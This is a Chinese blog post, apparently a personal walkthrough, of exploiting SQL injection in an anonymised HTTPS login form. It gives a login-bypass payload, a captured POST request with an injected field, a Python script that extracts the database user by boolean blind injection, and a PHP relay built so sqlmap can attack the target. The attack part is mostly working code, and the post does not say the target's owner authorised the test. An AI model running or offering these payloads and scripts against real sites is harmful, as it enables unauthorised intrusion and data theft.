一次sql注入中转

今天一朋友丢过来一个注入让我看看

url:http://xxxx/

先看下页面

常规测试一下

用户名输入：' or 1=1 -- -

密码任意

返回

用户名输入：' or 1=2 -- -

返回

基本可以判断存在注入

http request：

POST /xxxx.php HTTP/1.1
Host: xxxx
Connection: keep-alive
Content-Length: 56
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=q7m1tvv7gi017o9t86uck332e6

email=%27+or+1%3Dif%281%3D1%2C1%2C2%29--+-&password=fdaf

email：

email=' or 1=if(1=1 *,1,2)-- -

本以为这样我们就可以拿到sqlmap跑

然后sqlmap报错了

　　

[14:19:03] [CRITICAL] can't establish SSL connection

应该于https 证书有关，sqlmap貌似不能忽略证书，谷歌也没找到解决方法。

但是不死心

用py撸吧

import requests
import warnings
warnings.filterwarnings("ignore")

b = range(32,127)
d = range(1,20)
for l in d:
    for a in b:
        c="' or 1=if(1=1 and ascii(substr(user(),%s,1))=%s,1,2)-- -"% (l,a)
        payload = {"email":c,"password":"aaa"}
        r = requests.post("https://x.x.x.x/ad.php",payload,verify=False)
        s = len(r.text.encode('GBK','ignore'))
        #print s
        if s!=2769:
            print a
            continue
        

这里注意

r = requests.post("https://x.x.x.x/ad.php",payload,verify=False)

verify=False 可以忽略证书

该脚本可以正常得出结果

但是不死心 sqlmap 这一神器跑步了 不甘心，所以想到了用中专的方法。

<?php

$url = "https://x.x.x.x/aaa.php";
$sql = $_GET[s];
$s = urlencode($sql);
$params = "email=$s&password=aa";
//echo $params;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($ch, CURLOPT_HEADER, 0); 
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)');
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
 
curl_setopt($ch, CURLOPT_POST, 1);    // post 提交方式
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
 
$output = curl_exec($ch);
curl_close($ch);
$a = strlen($output);
#echo $a;
if($a==2846){
    echo "1";
}else{
    echo "2";
}

这里注意一下，下面的两句忽略证书

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);

然后抄起sqlmap就是干

　　

收工。　　

请勿转载！